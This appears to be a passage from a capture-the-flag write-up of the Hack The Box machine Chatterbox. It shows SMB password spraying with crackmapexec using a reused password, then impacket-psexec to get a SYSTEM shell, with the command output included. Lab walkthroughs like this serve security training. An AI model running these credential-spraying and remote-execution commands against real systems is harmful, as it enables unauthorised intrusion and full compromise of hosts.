Password Reuse
┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ crackmapexec smb $IP -u users -p 'Welcome1!' --continue-on-success
smb 10.10.10.74 445 chatterbox [*] windows 7 professional 7601 service pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
smb 10.10.10.74 445 chatterbox [+] chatterbox\alfred:Welcome1!
smb 10.10.10.74 445 chatterbox [+] chatterbox\administrator:Welcome1! (Pwn3d!)During the post enumeration phase, I have extracted the cleartext password for thealfred user
I was checking through SMB exploitations and came across this.
It turns out that the alfred user is the administrator user
This explains how alfred user has FULL control over the home directory of the administrator user
┌──(kali㉿kali)-[~/archive/htb/labs/chatterbox]
└─$ impacket-psexec 'administrator:Welcome1!@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file eNSosfMg.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service WZal on 10.10.10.74.....
[*] Starting service WZal.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Chatterbox
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter local area connection 4:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.74
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{111d2ff5-ef2c-4d77-b44c-dbce3aaabf4b}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise